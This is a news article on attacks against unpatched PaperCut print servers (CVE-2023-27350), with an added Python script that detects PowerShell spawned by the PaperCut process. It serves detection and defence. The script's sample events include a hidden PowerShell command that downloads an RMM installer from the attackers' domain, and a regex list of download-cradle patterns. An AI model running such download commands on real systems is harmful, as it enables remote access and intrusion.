Russian Hackers Suspected In Ongoing Exploitation Of Unpatched PaperCut Servers

PaperCut, a vendor of print management software, claimed it had “evidence to suggest that unpatched servers are being exploited in the wild,” referencing two vulnerability reports from security firm Trend Micro.

“PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC,” the company added.

The warning comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical improper access control flaw in PaperCut MF and NG (CVE-2023-27350, CVSS score: 9.8) to its Known Exploited Vulnerabilities (KEV) catalog.

Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from the PaperCut software to install remote monitoring and management (RMM) tools such as Atera and Syncro, giving the attackers persistent access and code execution on the compromised hosts.
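The behaviour Huntress describes is a parent/child process relationship that defenders can hunt for in endpoint telemetry: the PaperCut server process should have no business launching PowerShell, let alone one that pulls an RMM installer. The script below is an added example written for this page, not code from the article, PaperCut or Huntress. It assumes Sysmon-style process-creation events (fields ParentImage, Image, CommandLine) delivered as JSON lines, assumes the PaperCut application server runs as pc-app.exe (the article does not name the binary, so confirm it against your own install), and runs against constructed sample events. Only the RMM tool names and the hosting domain are taken from the article.

```python
"""Detection sketch for the PaperCut -> PowerShell -> RMM pattern.

Added example, not code from the article, PaperCut or Huntress. It reads
Sysmon-style process-creation events (fields ParentImage, Image, CommandLine)
as JSON lines and flags PowerShell spawned by the PaperCut application server,
raising the severity when the command line references the RMM tools or the
hosting domain named in the article.
"""
import json
import re
from typing import Iterable, List, Optional

# ASSUMPTION: the PaperCut application server binary. The article does not name
# it; confirm the parent process name against your own installation.
PAPERCUT_PARENTS = {"pc-app.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Indicators taken from the article: the RMM tools installed and the domain
# that hosted them (the defanged "[.]" is normalised for matching).
RMM_TOOLS = ("atera", "syncro")
HOSTING_DOMAIN = "windowservicecemter[.]com".replace("[.]", ".")

# Generic download-cradle / encoded-command switches; weaker evidence on their own.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc\b|"
    r"-encodedcommand|frombase64string|bitsadmin",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> Optional[dict]:
    """Return an alert for a PaperCut-spawned PowerShell event, else None."""
    if basename(ev.get("ParentImage", "")) not in PAPERCUT_PARENTS:
        return None
    if basename(ev.get("Image", "")) not in POWERSHELL:
        return None
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()
    reasons = ["PaperCut server process spawned PowerShell"]
    severity = "medium"  # unusual on its own; escalate on known indicators
    if HOSTING_DOMAIN in low:
        reasons.append(f"command line references {HOSTING_DOMAIN}")
        severity = "high"
    for tool in RMM_TOOLS:
        if tool in low:
            reasons.append(f"command line references RMM tool '{tool}'")
            severity = "high"
    if CRADLE_RE.search(cmd):
        reasons.append("download-cradle or encoded-command pattern")
        severity = "high"
    return {"severity": severity, "reasons": reasons, "command_line": cmd}


def triage(lines: Iterable[str]) -> List[dict]:
    """Parse JSON-lines events and return alerts, highest severity first."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        alert = score_event(json.loads(line))
        if alert:
            alerts.append(alert)
    return sorted(alerts, key=lambda a: a["severity"] != "high")


# Constructed sample events (not real telemetry). Paths and file names are
# illustrative; only the domain and tool names come from the article.
SAMPLE_EVENTS = [
    r'{"EventID": 1, "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe",'
    r' "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",'
    r' "CommandLine": "powershell.exe -nop -w hidden -c Invoke-WebRequest'
    r' http://windowservicecemter.com/files/AteraSetup.msi -OutFile C:\\Windows\\Temp\\a.msi"}',
    r'{"EventID": 1, "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe",'
    r' "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",'
    r' "CommandLine": "powershell.exe -File C:\\scripts\\rotate-logs.ps1"}',
    r'{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",'
    r' "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",'
    r' "CommandLine": "powershell.exe"}',
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(a["severity"].upper(), "|", "; ".join(a["reasons"]))
```

The parent/child check is the durable part of the rule: indicator strings such as the domain will age out quickly, but the PaperCut server launching a shell interpreter is anomalous regardless of what the command line says, which is why a bare match is still raised at medium rather than dropped. In a real deployment you would also treat cmd.exe as a suspicious child of the same parent, since it is a common intermediary before PowerShell.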

Additional infrastructure analysis revealed that the domain hosting the tools, windowservicecemter[.]com, was registered on April 12, 2023, and also hosted malware such as TrueBot, although the company said it did not directly observe the downloader being deployed.

TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical links with Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.

“While the ultimate goal of the current activity leveraging PaperCut’s software is unknown, these links (albeit somewhat circumstantial) to a known ransomware entity are concerning,” Huntress researchers said.

“Potentially, the access gained through PaperCut exploitation could be used as a foothold leading to follow-on movement within the victim network, and ultimately ransomware deployment.”

Users are advised to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11, and 22.0.9) as soon as possible, regardless of whether the server is “available to external or internal connections,” to mitigate the risk.

Customers who are unable to upgrade to a patched version are advised to lock down network access to the servers by blocking all inbound traffic from external IP addresses and restricting access to the IP addresses of verified site servers.
